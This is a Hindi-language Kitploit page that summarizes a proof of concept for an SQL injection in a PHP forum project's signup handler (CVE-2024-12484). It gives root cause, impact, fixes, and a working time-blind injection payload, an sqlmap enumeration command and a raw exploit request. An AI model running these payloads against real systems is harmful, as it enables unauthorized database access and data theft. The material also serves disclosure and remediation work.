Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12484 — CVE-poc | Kitploit
उपकरण/GitHubGitHub/lichaser/cve-2024-12484
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHublichaser/cve-2024-12484

CVE-2024-12484

CVE-poc

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE

CVE-poc

समस्या प्रकार

SQL Injection

मूल कारण

"/signuppost.php" फ़ाइल में "Technical Forum Using PHP Source Code" प्रोजेक्ट में SQL इंजेक्शन भेद्यता पाई गई है। यह भेद्यता इस तथ्य से उत्पन्न होती है कि कोई हमलावर लॉगिन उपयोगकर्ता नाम पैरामीटर के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है और बिना सत्यापन के उस पैरामीटर का सीधे SQL क्वेरी में उपयोग कर सकता है। यह हमलावर को SQL क्वेरी में हेरफेर करने और अनधिकृत कार्य करने के लिए इनपुट मानों को गलत साबित करने की अनुमति देता है।

प्रभाव

कोई हमलावर इस SQL इंजेक्शन भेद्यता का शोषण करके डेटाबेस तक अनधिकृत पहुँच प्राप्त कर सकता है, संवेदनशील डेटा का खुलासा कर सकता है, डेटा के साथ छेड़छाड़ कर सकता है, सिस्टम को पूरी तरह से नियंत्रित कर सकता है, या यहाँ तक कि सेवाओं को बाधित कर सकता है, जिससे सिस्टम सुरक्षा और व्यवसाय की निरंतरता के लिए गंभीर खतरा पैदा हो सकता है।

भेद्यता विवरण और PoC

भेद्यता का नाम: UserName पैरामीटर

root@kitploit:~
Payload
Parameter: Username (POST)
Type: Time Blind Injection Time Blind Injection
Title: Time Blind Injection Time Blind Injection
Payload: username=admin' AND (SELECT 9335 FROM (SELECT(SLEEP(5)))NwOL) AND 'SGvn' = 'SGvn'
Screenshot of the specific information obtained when testing and running the sqlmap utility

image

root@kitploit:~
//sqlmap
python sqlmap.py -r url.txt --level 1 --risk 1 --current-db --current-user --is-dba
root@kitploit:~
poc
POST /signuppost.php HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
Origin: http://127.0.0.1:8083
Connection: keep-alive
Referer: http://127.0.0.1:8083/signup.php
Cookie: PHPSESSID=ln2b6eftt76aon56uvppiurao3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

name=123&gender=male&email=13849221%40qq.com&contact=123123&username=admii&password=admin%40123&password_check=admin%40123&submit=SignUp

सुझाए गए सुधार

प्रीप्रोसेसिंग स्टेटमेंट और पैरामीटर बाइंडिंग का उपयोग करें प्रीप्रोसेसिंग स्टेटमेंट SQL कोड को उपयोगकर्ता इनपुट डेटा से अलग करके SQL इंजेक्शन को रोकते हैं। प्रीप्रोसेसिंग स्टेटमेंट का उपयोग करते समय, उपयोगकर्ता द्वारा दर्ज किए गए मानों को शुद्ध डेटा के रूप में माना जाता है और उन्हें SQL कोड के रूप में नहीं समझा जाता है।

इनपुट सत्यापन और फ़िल्टरिंग उपयोगकर्ता इनपुट डेटा को सख्ती से सत्यापित और फ़िल्टर करें ताकि यह सुनिश्चित हो सके कि यह अपेक्षित प्रारूप के अनुरूप है।

डेटाबेस उपयोगकर्ता विशेषाधिकारों को कम करें डेटाबेस से कनेक्ट करने के लिए उपयोग किए जाने वाले खातों में न्यूनतम आवश्यक विशेषाधिकार सुनिश्चित करें। दिन-प्रतिदिन के कार्यों के लिए उच्च विशेषाधिकार वाले खातों (जैसे "root" या "admin") के उपयोग से बचें।

नियमित सुरक्षा ऑडिट करें संभावित सुरक्षा कमजोरियों की समय पर पहचान और सुधार के लिए नियमित कोड और सिस्टम सुरक्षा ऑडिट करें।

इन अनुशंसाओं का पालन करके, आप अपने अनुप्रयोगों की सुरक्षा में बहुत सुधार कर सकते हैं और SQL इंजेक्शन भेद्यताओं से जुड़े जोखिमों को कम कर सकते हैं।

टूल डाउनलोड करें